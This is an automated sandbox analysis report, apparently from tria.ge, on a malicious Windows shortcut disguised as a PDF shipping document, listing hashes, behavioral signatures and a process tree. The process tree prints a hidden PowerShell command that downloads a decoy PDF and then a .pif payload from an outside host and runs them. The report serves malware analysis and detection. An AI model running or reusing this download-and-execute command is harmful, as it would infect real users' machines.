Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
239s -
max time network
243s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
19/09/2024, 09:47
Static task
static1
Behavioral task
behavioral1
Sample
HBL10909LIT266NR5272RBL2021PRD66178278_LAX2778.PDF/HBL10909LIT266NR5272RBL2021PRD66178278_LAX2778.PDF.lnk
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
HBL10909LIT266NR5272RBL2021PRD66178278_LAX2778.PDF/HBL10909LIT266NR5272RBL2021PRD66178278_LAX2778.PDF.lnk
Resource
win10v2004-20240802-en
General
-
Target
HBL10909LIT266NR5272RBL2021PRD66178278_LAX2778.PDF/HBL10909LIT266NR5272RBL2021PRD66178278_LAX2778.PDF.lnk
-
Size
2KB
-
MD5
b3173ef1cf4572a76e159dc513e3fc31
-
SHA1
dbb727b41a95e6976afb742741af16952467af00
-
SHA256
82277e734f339a7fce08aac2b342fae94e20f3349a568b839d39ccd3a81cc215
-
SHA512
3e479a063085634ccce4bd04645c16c61ef357f44a97a71be95abbed4e30eca27fe661e302e04f9d699dcf7454f6ee0b15304f02e49f7ad8d815db65b64f8909
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 1920 powershell.exe 1920 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1920 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1920 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2300 wrote to memory of 1920 2300 cmd.exe 31 PID 2300 wrote to memory of 1920 2300 cmd.exe 31 PID 2300 wrote to memory of 1920 2300 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\HBL10909LIT266NR5272RBL2021PRD66178278_LAX2778.PDF\HBL10909LIT266NR5272RBL2021PRD66178278_LAX2778.PDF.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2300 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -Command "Invoke-WebRequest -Uri "http://tradimex.cc/eDVkOEaO/KD20240829230014246600006B6BA327.pdf" -OutFile "$env:TEMP\spoof.pdf"; Start-Process "$env:TEMP\spoof.pdf"; Start-Sleep -Seconds 20; Invoke-WebRequest -Uri "http://tradimex.cc/DgjopIWH/TJgGO5EprAaBIME.pif" -OutFile "$env:TEMP\target.pif"; Start-Process "$env:TEMP\target.pif""2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1920
-